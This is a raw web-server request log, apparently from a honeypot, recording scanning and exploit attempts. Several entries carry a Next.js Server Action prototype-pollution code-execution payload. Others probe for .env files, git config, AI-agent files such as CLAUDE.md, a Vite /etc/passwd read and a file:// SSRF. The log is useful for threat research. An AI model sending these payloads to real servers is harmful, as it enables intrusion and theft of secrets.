{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 45383+true+2645782;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx120073524507
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_120073524507
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx120073524507
X-Nextjs-Request-Id: poop1234
Content-Length: 517
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.18:39686
Path: /api/route
URL: /api/route
Method: POST
[2026-03-29 06:20:50] === HTTP Request ===
===================
------WebKitFormBoundaryx20419291663--
------WebKitFormBoundaryx20419291663
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx20419291663
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 15582+true+1310441;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx20419291663
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx20419291663
X-Nextjs-Request-Id: poop1234
Content-Length: 513
X-Nextjs-Html-Request-Id: ilovepoop_20419291663
Next-Action: x
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.18:36006
Path: /app
URL: /app
Method: POST
[2026-03-29 06:20:34] === HTTP Request ===
===================
------WebKitFormBoundaryx751443826107--
------WebKitFormBoundaryx751443826107
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx751443826107
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 167806+true+4478051;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx751443826107
X-Nextjs-Html-Request-Id: ilovepoop_751443826107
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx751443826107
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 518
Next-Action: x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.18:35990
Path: /_next/server
URL: /_next/server
Method: POST
[2026-03-29 06:20:26] === HTTP Request ===
===================
------WebKitFormBoundaryx1443390308471--
------WebKitFormBoundaryx1443390308471
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx1443390308471
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 224465+true+6430358;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx1443390308471
X-Nextjs-Html-Request-Id: ilovepoop_1443390308471
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx1443390308471
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
X-Nextjs-Request-Id: poop1234
Next-Action: x
Accept-Encoding: gzip, deflate
Content-Length: 522
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.18:60432
Path: /api
URL: /api
Method: POST
[2026-03-29 06:20:16] === HTTP Request ===
===================
------WebKitFormBoundaryx323454816301--
------WebKitFormBoundaryx323454816301
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx323454816301
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 109956+true+2941675;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx323454816301
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.
Content-Length: 518
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx323454816301
Next-Action: x
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_323454816301
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.18:50826
Path: /_next
URL: /_next
Method: POST
[2026-03-29 06:20:08] === HTTP Request ===
[2026-03-29 06:19:58] Main page accessed - IP: 45.205.1.18:36878
===================
------WebKitFormBoundaryx987700624717--
------WebKitFormBoundaryx987700624717
"$@0"
Content-Disposition: form-data; name="1"
------WebKitFormBoundaryx987700624717
{"then":"$1:__proto__:then","status":"resolved_model","reason":-1,"value":"{\"then\":\"$B\"}","_response":{"_prefix":"r = 235677+true+4190908;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${r}`});return","_formData":{"get":"$1:constructor:constructor"}}}
Content-Disposition: form-data; name="0"
Body: ------WebKitFormBoundaryx987700624717
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx987700624717
X-Nextjs-Request-Id: poop1234
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Connection: close
X-Nextjs-Html-Request-Id: ilovepoop_987700624717
Next-Action: x
Content-Length: 518
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 45.205.1.18:36878
Path: /
URL: /
Method: POST
[2026-03-29 06:19:58] === HTTP Request ===
===================
Connection: close
User-Agent: fasthttp
Headers:
Protocol: HTTP/1.1
Host: qjnbrdefect.vulnberries.ru:8081
RemoteAddr: 8.219.14.97:57238
Path: /sitemap.xml
URL: /sitemap.xml
Method: GET
[2026-03-29 06:17:45] === HTTP Request ===
===================
Connection: close
User-Agent: fasthttp
Headers:
Protocol: HTTP/1.1
Host: qjnbrdefect.vulnberries.ru:8081
RemoteAddr: 8.219.14.97:57234
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-29 06:17:45] === HTTP Request ===
===================
Connection: close
User-Agent: fasthttp
Headers:
Protocol: HTTP/1.1
Host: qjnbrdefect.vulnberries.ru:8081
RemoteAddr: 8.219.14.97:57236
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-29 06:17:45] === HTTP Request ===
[2026-03-29 06:17:45] Main page accessed - IP: 8.219.14.97:57020
===================
Connection: close
Accept-Language: zh-CN,zh;q=0.9
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: qjnbrdefect.vulnberries.ru:8081
RemoteAddr: 8.219.14.97:57020
Path: /
URL: /
Method: GET
[2026-03-29 06:17:45] === HTTP Request ===
===================
X-Forwarded-For: 66.132.224.226
Via: 1.1 Caddy
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:37064
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-29 06:08:38] === HTTP Request ===
[2026-03-29 06:08:31] Main page accessed - IP: 172.30.0.12:37064
===================
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 66.132.224.226
Via: 1.1 Caddy
Accept-Encoding: gzip
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:37064
Path: /
URL: /
Method: GET
[2026-03-29 06:08:31] === HTTP Request ===
[2026-03-29 05:58:53] Login page accessed - IP: 193.142.146.230:41868
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 193.142.146.230:41868
Path: /login
URL: /login
Method: GET
[2026-03-29 05:58:53] === HTTP Request ===
[2026-03-29 05:34:09] Main page accessed - IP: 72.14.178.148:44664
===================
Accept: */*
User-Agent: Mozilla/5.0 zgrab/0.x
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 72.14.178.148:44664
Path: /
URL: /
Method: GET
[2026-03-29 05:34:09] === HTTP Request ===
===================
User-Agent: Mozilla/5.0
X-Forwarded-Proto: https
X-Forwarded-Host: admin.vulnberries.ru
X-Forwarded-For: 158.94.211.252
Via: 1.1 Caddy
Accept-Encoding: gzip, deflate
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: admin.vulnberries.ru
RemoteAddr: 172.30.0.12:46778
Path: /license.txt
URL: /license.txt
Method: GET
[2026-03-29 05:07:14] === HTTP Request ===
[2026-03-29 04:14:35] Main page accessed - IP: 20.171.9.56:58578
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 zgrab/0.x
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 20.171.9.56:58578
Path: /
URL: /
Method: GET
[2026-03-29 04:14:35] === HTTP Request ===
[2026-03-29 03:20:09] Main page accessed - IP: 176.65.149.45:51720
===================
Accept-Encoding: gzip
User-Agent: Go-http-client/1.1
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 176.65.149.45:51720
Path: /
URL: /
Method: GET
[2026-03-29 03:20:09] === HTTP Request ===
[2026-03-29 02:26:09] Main page accessed - IP: 198.235.24.163:63758
===================
Accept-Encoding: gzip
User-Agent: Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 198.235.24.163:63758
Path: /
URL: /
Method: GET
[2026-03-29 02:26:09] === HTTP Request ===
===================
Proxy-Connection: close
Headers:
Protocol: HTTP/1.1
Host: www.example.com:443
RemoteAddr: 185.224.128.16:40088
Path:
URL: //www.example.com:443
Method: CONNECT
[2026-03-29 02:08:21] === HTTP Request ===
[2026-03-29 01:16:54] Main page accessed - IP: 87.236.176.182:47201
===================
Accept-Encoding: gzip
Accept: */*
Connection: close
User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
Headers:
Protocol: HTTP/1.1
Host: dns.bakunin.me:8081
RemoteAddr: 87.236.176.182:47201
Path: /
URL: /
Method: GET
[2026-03-29 01:16:54] === HTTP Request ===
===================
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46
Accept-Language: en US,en;q=0.9,sv;q=0.8
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Connection: keep-alive
Accept: */*
Accept-Encoding: gzip, deflate, gzip, deflate
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 5.61.209.107:41964
Path: /SDK/webLanguage
URL: /SDK/webLanguage
Method: GET
[2026-03-29 01:10:34] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 79.124.40.174:57482
Path: /jars
URL: /jars
Method: GET
[2026-03-28 23:05:56] === HTTP Request ===
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.195.62:62630
Path: /robots.txt
URL: /robots.txt
Method: GET
[2026-03-28 17:48:16] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.195.62:60828
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-28 17:48:02] === HTTP Request ===
===================
Protocol: HTTP/2.0
Host:
RemoteAddr: 66.132.195.62:60812
Path: *
URL: *
Method: PRI
[2026-03-28 17:48:02] === HTTP Request ===
[2026-03-28 17:48:02] Main page accessed - IP: 66.132.195.62:60808
===================
Accept-Encoding: gzip
Accept: */*
User-Agent: Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 66.132.195.62:60808
Path: /
URL: /
Method: GET
[2026-03-28 17:48:02] === HTTP Request ===
[2026-03-28 14:18:50] Main page accessed - IP: 134.209.95.237:42860
===================
Protocol: HTTP/1.1
Host: 95.143.191.38
RemoteAddr: 134.209.95.237:42860
Path: /
URL: /
Method: GET
[2026-03-28 14:18:50] === HTTP Request ===
===================
Accept-Encoding: gzip
Pragma: no-cache
Connection: keep-alive
Cache-Control: no-cache
Accept-Language: en;q=0.7,en-US;q=0.3
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 194.187.176.26:63050
Path: /favicon.ico
URL: /favicon.ico
Method: GET
[2026-03-28 13:54:58] === HTTP Request ===
[2026-03-28 13:54:58] Main page accessed - IP: 194.187.176.164:63038
===================
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Accept-Encoding: gzip
Pragma: no-cache
Connection: keep-alive
Cache-Control: no-cache
Accept-Language: en;q=0.7,en-US;q=0.3
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 194.187.176.164:63038
Path: /
URL: /
Method: GET
[2026-03-28 13:54:58] === HTTP Request ===
===================
Accept: */*
User-Agent: xfa1
Headers:
Protocol: HTTP/1.0
Host: 95.143.191.38
RemoteAddr: 104.238.194.12:64326
Path: /admin/config.php
URL: /admin/config.php
Method: GET
[2026-03-28 13:52:44] === HTTP Request ===
[2026-03-28 12:53:40] Main page accessed - IP: 34.22.172.118:55920
===================
Accept-Encoding: gzip, deflate
User-Agent: python-requests/2.32.5
Connection: keep-alive
Accept: */*
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 34.22.172.118:55920
Path: /
URL: /
Method: GET
[2026-03-28 12:53:40] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:59654
Path: /.env.save
URL: /.env.save
Method: GET
[2026-03-28 11:06:17] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:59650
Path: /api/v1/status
URL: /api/v1/status
Method: GET
[2026-03-28 11:06:17] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:59634
Path: /Config.json
URL: /Config.json
Method: GET
[2026-03-28 11:06:16] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:59626
Path: /config.json
URL: /config.json
Method: GET
[2026-03-28 11:06:16] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:59610
Path: /.claude/claude.config.js
URL: /.claude/claude.config.js
Method: GET
[2026-03-28 11:06:16] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:59608
Path: /.claude/settings.json
URL: /.claude/settings.json
Method: GET
[2026-03-28 11:06:16] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:59598
Path: /login.action
URL: /login.action
Method: GET
[2026-03-28 11:06:15] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:59588
Path: /.clauderc
URL: /.clauderc
Method: GET
[2026-03-28 11:06:15] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:59584
Path: /.json
URL: /.json
Method: GET
[2026-03-28 11:06:15] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:59568
Path: /test.php
URL: /test.php
Method: GET
[2026-03-28 11:06:15] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:59566
Path: /info.php
URL: /info.php
Method: GET
[2026-03-28 11:06:14] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:59552
Path: /idx_config/
URL: /idx_config/
Method: GET
[2026-03-28 11:06:14] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:59540
Path: /.env.backup
URL: /.env.backup
Method: GET
[2026-03-28 11:06:14] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:59530
Path: /Dockerfile
URL: /Dockerfile
Method: GET
[2026-03-28 11:06:13] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:59524
Path: /task.md
URL: /task.md
Method: GET
[2026-03-28 11:06:13] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:59514
Path: /CLAUDE.md
URL: /CLAUDE.md
Method: GET
[2026-03-28 11:06:13] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:59510
Path: /CLAUDE.MD
URL: /CLAUDE.MD
Method: GET
[2026-03-28 11:06:13] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:59496
Query: import&raw??
Path: /@fs/etc/passwd
URL: /@fs/etc/passwd?import&raw??
Method: GET
[2026-03-28 11:06:12] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:59488
Path: /server.go
URL: /server.go
Method: GET
[2026-03-28 11:06:12] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:59472
Path: /server.py
URL: /server.py
Method: GET
[2026-03-28 11:06:12] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:59468
Path: /.config
URL: /.config
Method: GET
[2026-03-28 11:06:11] === HTTP Request ===
===================
User-Agent: l9explore/1.2.2
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:59460
Path: /claude.md
URL: /claude.md
Method: GET
[2026-03-28 11:06:11] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:59454
Path: /.claude/claude.json
URL: /.claude/claude.json
Method: GET
[2026-03-28 11:06:11] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:59438
Path: /.vscode/sftp.json
URL: /.vscode/sftp.json
Method: GET
[2026-03-28 11:06:10] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:59430
Path: /s/lkx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
URL: /s/lkx/_/;/META-INF/maven/com.atlassian.jira/jira-webapp-dist/pom.properties
Method: GET
[2026-03-28 11:06:10] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:59420
Path: /.env.example
URL: /.env.example
Method: GET
[2026-03-28 11:06:10] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:59406
Path: /dockerfile
URL: /dockerfile
Method: GET
[2026-03-28 11:06:09] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:59392
Path: /phpinfo.php
URL: /phpinfo.php
Method: GET
[2026-03-28 11:06:09] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:59388
Path: /telescope/requests
URL: /telescope/requests
Method: GET
[2026-03-28 11:06:09] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:59374
Path: /.git/config
URL: /.git/config
Method: GET
[2026-03-28 11:06:09] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:59360
Path: /.secret
URL: /.secret
Method: GET
[2026-03-28 11:06:08] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:59348
Path: /.env.local
URL: /.env.local
Method: GET
[2026-03-28 11:06:08] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:35972
Path: /docker-compose.override.yml
URL: /docker-compose.override.yml
Method: GET
[2026-03-28 11:06:08] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:35966
Path: /docker-compose.yml
URL: /docker-compose.yml
Method: GET
[2026-03-28 11:06:07] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:35954
Path: /api.json
URL: /api.json
Method: GET
[2026-03-28 11:06:07] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:35952
Query: url=file:///etc/hosts
Path: /api/geojson
URL: /api/geojson?url=file:///etc/hosts
Method: GET
[2026-03-28 11:06:07] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:35950
Query: import&raw??
Path: /.env
URL: /.env?import&raw??
Method: GET
[2026-03-28 11:06:07] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:35934
Path: /main.go
URL: /main.go
Method: GET
[2026-03-28 11:06:07] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:35930
Path: /server.js
URL: /server.js
Method: GET
[2026-03-28 11:06:06] === HTTP Request ===
===================
User-Agent: l9explore/1.2.2
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:35914
Path: /main.js
URL: /main.js
Method: GET
[2026-03-28 11:06:06] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:35912
Path: /docker-compose.yaml
URL: /docker-compose.yaml
Method: GET
[2026-03-28 11:06:06] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:35898
Path: /PROMPT.md
URL: /PROMPT.md
Method: GET
[2026-03-28 11:06:05] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:35892
Path: /CONTEXT.md
URL: /CONTEXT.md
Method: GET
[2026-03-28 11:06:05] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:35880
Path: /README.md
URL: /README.md
Method: GET
[2026-03-28 11:06:05] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:35866
Path: /.env
URL: /.env
Method: GET
[2026-03-28 11:06:04] === HTTP Request ===
===================
Connection: close
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:35850
Path: /Claude.md
URL: /Claude.md
Method: GET
[2026-03-28 11:06:04] === HTTP Request ===
===================
Accept-Encoding: gzip
User-Agent: l9explore/1.2.2
Connection: close
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:35846
Path: /main.py
URL: /main.py
Method: GET
[2026-03-28 11:06:04] === HTTP Request ===
===================
User-Agent: l9explore/1.2.2
Connection: close
Accept-Encoding: gzip
Headers:
Protocol: HTTP/1.1
Host: 95.143.191.38:8081
RemoteAddr: 168.100.9.75:35844
Path: /.env.production
URL: /.env.production
Method: GET
[2026-03-28 11:06:03] === HTTP Request ===
